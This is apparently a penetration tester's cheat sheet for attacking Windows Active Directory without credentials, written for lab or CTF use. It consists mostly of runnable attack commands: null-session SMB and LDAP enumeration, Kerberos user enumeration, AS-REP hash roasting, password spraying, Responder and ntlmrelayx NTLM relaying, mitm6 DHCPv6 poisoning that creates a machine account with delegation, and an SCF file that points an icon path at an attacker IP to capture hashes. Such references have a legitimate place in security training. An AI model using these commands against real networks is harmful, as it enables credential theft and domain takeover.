w/o Creds

First enumeration

# Basic infos
crackmapexec smb RHOST --pass-pol --users

# List SMB shares (You need to try all of them)
crackmapexec smb RHOST --shares
crackmapexec smb RHOST -u '' -p '' --shares # Null Session
smbclient -N -L \\\\RHOST # Null Session
crackmapexec smb RHOST -u 'a' -p '' --shares

# Other protocols
crackmapexec rdp RHOST
crackmapexec winrm RHOST
crackmapexec ldap RHOST
crackmapexec wmi RHOST
crackmapexec mssql RHOST

enum4linux RHOST
rpcdump.py RHOST | grep Provider | sort -u

Active Directory

Dump ldap infos with a null session

ldapsearch -H ldap://domain.com -x -s base '' "(objectClass=*)" "*" + | tee /tmp/ldapsearchtop
ldapsearch -H ldap://domain.com -x -b dc=domain,dc=com | tee /tmp/ldapsearchcontent

If you have kerberos port open on a DC, you can try to list users

kerbrute userenum --dc 1.2.3.4 --domain domain.com /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt

Then try to AS-REP if you found users

GetNPUsers.py -debug 'domain.com/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.4

Password Spray

https://mayfly277.github.io/posts/GOADv2-pwning-part2/

https://github.com/Hackndo/sprayhound

# classic user=password test
crackmapexec smb RHOST -u users.txt -p users.txt --no-bruteforce
sprayhound -U users.txt -d north.sevenkingdoms.local -dc RHOST --lower

# When providing a valid domain account, sprayhound will try and find default domain policy and check badpwdcount attribute of each user against lockout threshold. If too close, it will skip these accounts.
sprayhound -U users.txt -d north.sevenkingdoms.local -dc RHOST -lu validuser -lp validpass --lower -t 2

NetNTLM Relay

https://beta.hackndo.com/ntlm-relay/

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

Responder will respond to any broadcast request (MDNS, LLMNR ..) and trigger authentification

ntlmrelayx will relay NetNTLMv2 auth to targets (By default, ntlmrelayx.py upon a successful relay will dump the SAM database of the target.)

possible targets are servers without SMB signature, cme (crackmapexec)

cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
ntlmrelayx.py -smb2support --no-http-server -ip LHOST -w -tf /tmp/targets.txt -of /tmp/netntlm
sudo python3 /opt/Responder/Responder.py -I tun0 -w

You can try to force NTLM authentification

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/printers-spooler-service-abuse

https://github.com/p0dalirius/Coercer

SCF File

https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication

Putting a scf file on a share can lead users to initiate an SMB communication to your server without user interaction.

(It doesn’t seems to work on recent windows)

sudo python3 /opt/Responder/Responder.py -I tun0 -w

cat <<'EOF'|unix2dos >/tmp/givemehashplease.scf
[Shell]
Command=2
IconFile=\\10.10.14.60\beep\boop.ico
[Taskbar]
Command=ToggleDesktop
EOF

DHCP6

mitm6 + ntlmrelayx

mitm6 -i tun0 -d domain.com --debug
ntlmrelayx.py -6 -wh wpadfakeserver.domain.com -t ldaps://dc.domain.com --add-computer relayedpccreate --delegate-access